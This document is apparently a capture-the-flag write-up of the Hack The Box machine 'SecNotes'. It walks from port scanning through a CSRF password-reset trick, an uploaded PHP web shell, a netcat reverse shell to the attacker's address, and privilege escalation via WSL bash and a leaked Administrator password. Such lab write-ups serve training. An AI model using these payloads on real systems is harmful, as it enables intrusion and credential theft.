Description

Name: SecNotes

IP: 10.10.10.97

Author: 0xdf

Difficulty: 5/10

Discovery

nmap -sV -sC -Pn -p- -T4 --min-rate 1000 --max-retries 5 10.10.10.97

80/tcp open http Microsoft IIS httpd 10.0

| http-methods:

|_ Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/10.0

| http-title: Secure Notes - Login

|_Requested resource was login.php

445/tcp open microsoft-ds Windows 10 Enterprise 17134 microsoft-ds (workgroup: HTB)

8808/tcp open http Microsoft IIS httpd 10.0

| http-methods:

|_ Potentially risky methods: TRACE

|_http-server-header: Microsoft-IIS/10.0

|_http-title: IIS Windows

Service Info: Host: SECNOTES; OS: Windows; CPE: cpe:/o:microsoft:windows



Host script results:

|_clock-skew: mean: 2h20m06s, deviation: 4h02m30s, median: 5s

| smb-os-discovery:

| OS: Windows 10 Enterprise 17134 (Windows 10 Enterprise 6.3)

| OS CPE: cpe:/o:microsoft:windows_10::-

| Computer name: SECNOTES

| NetBIOS computer name: SECNOTES\x00

| Workgroup: HTB\x00

|_ System time: 2018-08-28T02:44:42-07:00

| smb-security-mode:

| account_used: <blank>

| authentication_level: user

| challenge_response: supported

|_ message_signing: disabled (dangerous, but default)

| smb2-security-mode:

| 2.02:

|_ Message signing enabled but not required

| smb2-time:

| date: 2018-08-28 11:44:43

|_ start_date: N/A

With dirsearch we found:

200 — /login.php

200 — /Login.php

500 — /auth.php

200 — /home.php -> /login.php

200 — /resister.php

Pwn

Using nullinux we didn’t found any share without credentials.

Before trying to brute-force or bypass the login with SQLi we registered a username to access the home page.

Keep It Simple, Stupid

From the home page we saw that tyler is the accountable of the GDPR for secnotes.htb and we can contact him via e-mail; from the home page we can choose to:

submit_note: a POST request with title=asd¬ed=asd&Submit=Save to insert a new note on your personal page; this funcionality is vulnerable to XSS

a POST request with to insert a new note on your personal page; this funcionality is vulnerable to XSS change_pass : a POST request with password=newpass&confirm_password=newpass&submit=submit (this request also works in GET)

: a POST request with (this request also works in GET) logout : a GET request to logout from the website

: a GET request to logout from the website contact : a POST request with message=hello&submit=Send to send to tyler@secnotes.htb a message

In the contact form we can send a link and Tyler will open it (client attack).

Message sent

Feedback from Tyler

While testing all the site functionality nikto finished the scan and we saw that the application supports: GET, POST, TRACE, HEAD and OPTIONS.

At first we focused only on crafting some payload to get a shell from the email form; but then (thank to Nauten) we tried to use the change_pass feature with GET parameters as:

curl -s -X GET http://10.10.10.97/change_pass.php?password=dodopass&confirm_password=dodopass&submit=submit

Actually the password was changed to dodopass so we passed the same link to Tyler using the contact form.

We can now login as tyler

Home page of Tyler

From the home page we got a recipe, a list of years and an URL of a SMB share with username and password:

\\secnotes.htb

ew-site

tyler / 92g!mA8BGjOirkL%OG*&

We can now connect the the new-site share.

Since we saw that isstart.htm is present and is the default page presented on the web server on port 8808 we uploaded a simple PHP shell:

<?php

system($_GET["cmd"]);

We can now execute commands on the machine and maybe get the first flag!

Web Shell

Using the web shell we enumerated the users and asked for user.txt in Tyler’s Desktop folder.

User flag

To upgrade the web shell to a reverse shell we cannot use meterpreter since on this machine is active an AV (or just Windows Defender is enough to block meterpreter stages and connections) so we uploaded the portable version of Netcat using the share and then issued the command to connect back to our machine (to create a FUD EXE see the Rabbit Writeup).

http "http://10.10.10.97:8808/dodo.php?cmd=nc.exe 10.10.XX.XX 3488 -e powershell.exe

From the user Desktop folder we also saw a link to a bash PE in “C:\Windows\System32\bash.exe” but no such PE was found in that directory. The “bash.exe” should also be linked to a WLS (Windows Linux Subsystem) installed on the machine and that could be exploit/used to gain “SYSTEM/NT” privileges.

To search for a “bash.exe” executable we launched a find command in PowerShell Get-Children -Path C:\Windows -Include bash.exe -File -Recurse -ErrorAction SilentlyContinue .

After a while (a log, maybe dir /b /s bash.exe is faster) we found that “bash.exe” is located at:

C:\Windows\WinSxS\amd64_microsoft-windows-lxss-bash_31bf3856ad364e35_10.0.17134.1_none_251beae725bc7de5\bash.exe

root BASH

After poking around we discovered that even if we are `root` we cannot access “Administator” folder and thus read the system flag.



So we searched, using BASH, on the classic location where to find succulent information in a Linux system and in the root home we found the “Administator” password for a SMB share in the “.bash_history” file.

Using smbclient we connected to the sare and downloaded the root flag file.

root flag

https://www.hackthebox.eu/profile/1752